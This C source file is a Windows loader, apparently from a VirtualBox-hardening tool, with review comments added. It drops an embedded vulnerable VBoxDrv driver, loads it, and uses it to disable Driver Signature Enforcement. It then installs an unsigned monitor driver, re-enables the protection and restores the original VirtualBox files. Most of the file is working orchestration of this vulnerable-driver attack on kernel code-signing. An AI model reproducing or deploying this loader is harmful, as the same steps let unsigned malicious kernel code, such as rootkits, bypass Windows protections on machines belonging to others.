/*
* UnloadVulnerableDriver
*
* Purpose:
*
* Undo LoadVulnerableDriver: stop the VBoxDrv service that was started with
* the dropped driver and, when the machine had its own VirtualBox install
* (g_VBoxInstalled), put the original VBoxDrv back from the backup taken by
* supBackupVBoxDrv(FALSE). With no VirtualBox present the service is simply
* unloaded.
*
*/
void UnloadVulnerableDriver(
    VOID
)
{
    SC_HANDLE hScm;

    if (g_VBoxInstalled == TRUE) {
        //
        // VirtualBox is installed: stop (do not delete) the service we
        // started, then restore the saved driver file.
        //
        // NOTE(review): SC_MANAGER_ALL_ACCESS is broader than stopping a
        // service needs; SC_MANAGER_CONNECT is normally enough to open a
        // service for SERVICE_STOP -- confirm against scmStopDriver before
        // narrowing.
        //
        hScm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
        if (hScm != NULL) {
            scmStopDriver(hScm, VBoxDrvSvc);
            CloseServiceHandle(hScm);
        }

        //
        // A failed OpenSCManager is ignored on purpose: the backup is
        // restored regardless so the original driver file is never lost.
        //
        supBackupVBoxDrv(TRUE);
        return;
    }

    //
    // No VirtualBox on this machine: nothing to restore, just unload.
    //
    scmUnloadDeviceDriver(VBoxDrvSvc);
}
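/*
* LoadVulnerableDriver
*
* Purpose:
*
* Drop the embedded VBoxDrv image to <system dir>\drivers\VBoxDrv.sys, load it
* through the VBoxDrv service and return the opened device handle. Any
* existing VBoxDrv.sys is backed up first via supBackupVBoxDrv(FALSE) and the
* result is recorded in g_VBoxInstalled for UnloadVulnerableDriver.
*
* Returns the device handle on success, NULL on failure. On failure after the
* file was written it is deleted again, so no truncated or unused driver
* image is left in the drivers directory; restoring the backup is left to
* UnloadVulnerableDriver.
*
*/
HANDLE LoadVulnerableDriver(
    VOID
)
{
    HANDLE hFile;
    HANDLE hDevice = NULL;
    DWORD bytesIO = 0;
    DWORD cch;
    BOOL bWritten;
    WCHAR szDriverBuffer[BUFFER_SIZE];
    WCHAR szSuffix[] = TEXT("\\drivers\\VBoxDrv.sys");

    //
    // Combine full path name for our driver.
    // Zero the whole array (sizeof, not BUFFER_SIZE: the elements are WCHAR).
    //
    RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
    cch = GetSystemDirectory(szDriverBuffer, MAX_PATH);

    //
    // 0 is failure; a value >= MAX_PATH means the path did not fit and the
    // return value is the required size, not a usable path. Treat both as
    // failure rather than appending to a truncated directory name.
    //
    if (cch == 0 || cch >= MAX_PATH) {
        return NULL;
    }

    //
    // _strcat is unbounded and BUFFER_SIZE is defined elsewhere, so check
    // that directory + suffix + NUL fits before concatenating.
    //
    if (cch + (sizeof(szSuffix) / sizeof(szSuffix[0])) > BUFFER_SIZE) {
        return NULL;
    }
    _strcat(szDriverBuffer, szSuffix);

    //
    // Backup vboxdrv if exists; remembered for UnloadVulnerableDriver.
    //
    g_VBoxInstalled = supBackupVBoxDrv(FALSE);

    //
    // Drop our driver file to the disk.
    //
    hFile = CreateFile(szDriverBuffer, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return NULL;
    }
    bWritten = WriteFile(hFile, VBoxDrv, sizeof(VBoxDrv), &bytesIO, NULL);
    CloseHandle(hFile);

    //
    // Check if file dropped OK. A failed or short write leaves a truncated
    // image behind; remove it instead of leaving a corrupt VBoxDrv.sys.
    //
    if (!bWritten || bytesIO != sizeof(VBoxDrv)) {
        DeleteFile(szDriverBuffer);
        return NULL;
    }

    //
    // Load the driver and open the device handle. The file is only needed
    // for the load itself, so it is removed on failure as well.
    //
    if (!scmLoadDeviceDriver(VBoxDrvSvc, szDriverBuffer, &hDevice)) {
        DeleteFile(szDriverBuffer);
        return NULL;
    }

    //
    // Driver file is no longer needed.
    //
    DeleteFile(szDriverBuffer);
    return hDevice;
}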
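/*
* ldrMain
*
* Purpose:
*
* Program entry point. Accepts one switch: "-l" (install) or "-u" (remove).
*
* Install: backs up and stops the installed VBoxDrv and the VBox network/USB
* components, loads the bundled vulnerable VBoxDrv, uses it to turn DSE off
* (ldrPatchDSE), installs the monitor (ldrSetMonitor), turns DSE back on,
* then restores the original VBoxDrv file and restarts what it stopped.
* An optional second parameter names a custom patch table
* (ldrFetchCustomPatchData).
*
* Remove: unloads the monitor driver and purges the system cache.
*
* Never returns normally; always ends in ExitProcess(0).
*
*/
void ldrMain(
    VOID
)
{
    BOOL cond = FALSE;
    LONG x;
    ULONG l = 0, dwCmd;
    DWORD cch;
    HANDLE hDevice;
    PVOID DataBuffer;
    BOOL bConDisabled, bUsbMonDisabled;
    WCHAR cmdLineParam[MAX_PATH + 1];
    WCHAR szDriverBuffer[MAX_PATH * 2];

    __security_init_cookie();

    bConDisabled = FALSE;
    bUsbMonDisabled = FALSE;
    DataBuffer = NULL;
    hDevice = NULL;
    dwCmd = 0;

    //
    // Single-pass loop: every "break" below lands in the common cleanup.
    //
    do {

        //
        // Check OS version.
        //
        RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
        g_osv.dwOSVersionInfoSize = sizeof(g_osv);
        RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);

        //
        // We support only Vista based OS.
        //
        if (g_osv.dwMajorVersion < 6) {
            MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."), T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Check number of instances running (decremented again at the end).
        //
        x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
        if (x > 1) {
            break;
        }

        //
        // Check if any VBox instances are running, they must be closed before our usage.
        // Point-in-time check only: a VirtualBox started after this is not detected.
        //
        if (supProcessExist(L"VirtualBox.exe")) {
            MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."), T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Query command line.
        //
        RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
        GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
        if (l == 0) {
            //
            // Nothing in command line, simple display help and leave.
            //
            MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Check known command.
        //
        if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
            dwCmd = TSMI_INSTALL;
        }
        else if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
            dwCmd = TSMI_REMOVE;
        }

        if (dwCmd == 0) {
            MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Init ldr and DSEFix.
        //
        if (!ldrInit(dwCmd)) {
            break;
        }

        //
        // Process command.
        //
        switch (dwCmd) {

        case TSMI_INSTALL:

            // Backup vboxdrv if exists.
            supBackupVBoxDrv(FALSE);

            // Stop VBox Networking and USB driver; remember what was actually
            // stopped so cleanup only restarts those.
            bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
            bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
            dsfStopDriver(VBoxDrvSvc);

            //
            // Build the path of the driver to drop.
            // 0 is failure; >= MAX_PATH means the directory did not fit and
            // the buffer holds no usable path. Bail on both instead of
            // appending to a truncated directory name.
            //
            // NOTE(review): the installed VBoxDrv service stopped above is
            // not restarted on this path (nor on the load-failure path
            // below) -- only the backup file is restored there.
            //
            RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
            cch = GetSystemDirectory(szDriverBuffer, MAX_PATH);
            if (cch == 0 || cch >= MAX_PATH) {
                MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."), NULL, MB_ICONINFORMATION);
                break;
            }
            // szDriverBuffer is MAX_PATH * 2, so the suffix always fits after a < MAX_PATH directory.
            _strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));

            // Load vulnerable VBoxDrv.
            hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
            if (hDevice) {

                //
                // Disable DSE so we can load monitor.
                // Device handle closed by DSEFix routine.
                //
                if (ldrPatchDSE(hDevice, TRUE)) {

                    // Stop our VBoxDrv, need reloading for 2nd usage.
                    dsfStopDriver(VBoxDrvSvc);

                    // Load custom patch table, if present (2nd command-line parameter).
                    RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
                    GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
                    if (l > 0) {
                        l = 0;
                        DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
                        if ((DataBuffer != NULL) && (l > 0)) {
                            g_TsmiPatchDataValue = DataBuffer;
                            g_TsmiPatchDataValueSize = l;
                        }
                    }

                    // Install and run monitor.
                    if (!ldrSetMonitor()) {
                        MessageBox(GetDesktopWindow(), TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
                    }

                    //
                    // Enable DSE back. If the driver cannot be restarted or the
                    // patch cannot be reverted, DSE stays off on this machine;
                    // that must not happen silently.
                    //
                    hDevice = NULL;
                    if (!dsfStartDriver(VBoxDrvSvc, &hDevice) || !ldrPatchDSE(hDevice, FALSE)) {
                        MessageBox(GetDesktopWindow(), TEXT("Error re-enabling DSE, it may remain disabled"), NULL, MB_ICONERROR);
                    }
                }
                else {
                    // ldrPatchDSE failure case: unknown error during DSE disabling attempt.
                    MessageBox(GetDesktopWindow(), TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
                }

                // Finally, remove our vboxdrv file and restore backup.
                dsfStopDriver(VBoxDrvSvc);
                DeleteFile(szDriverBuffer);
                supBackupVBoxDrv(TRUE);

                // Restart installed VBoxDrv.
                dsfStartDriver(VBoxDrvSvc, NULL);
            }
            else {
                // dsfLoadVulnerableDriver failure case: restore backup and report.
                supBackupVBoxDrv(TRUE);
                MessageBox(GetDesktopWindow(), TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
            }
            break;

        //
        // Remove command, unload our driver and purge file/memory list cache.
        //
        case TSMI_REMOVE:
            scmUnloadDeviceDriver(TsmiDrvName);
            supPurgeSystemCache();
            break;

        default:
            // Unreachable: dwCmd was validated above.
            break;
        }

    } while (cond);

    //
    // Cleanup after install.
    //
    if (dwCmd == TSMI_INSTALL) {

        // Re-enable VBox Network, UsbMonitor if they were disabled by us.
        if (bConDisabled) {
            supNetworkConnectionEnable(VBoxNetConnect, TRUE);
        }
        if (bUsbMonDisabled) {
            dsfStartDriver(VBoxUsbMon, NULL);
        }

        // Free memory allocated for custom patch table.
        // Assumes ldrFetchCustomPatchData allocates from the process heap -- confirm.
        if (DataBuffer != NULL) {
            HeapFree(GetProcessHeap(), 0, DataBuffer);
        }
    }

    InterlockedDecrement((PLONG)&g_lApplicationInstances);
    ExitProcess(0);
    return;
}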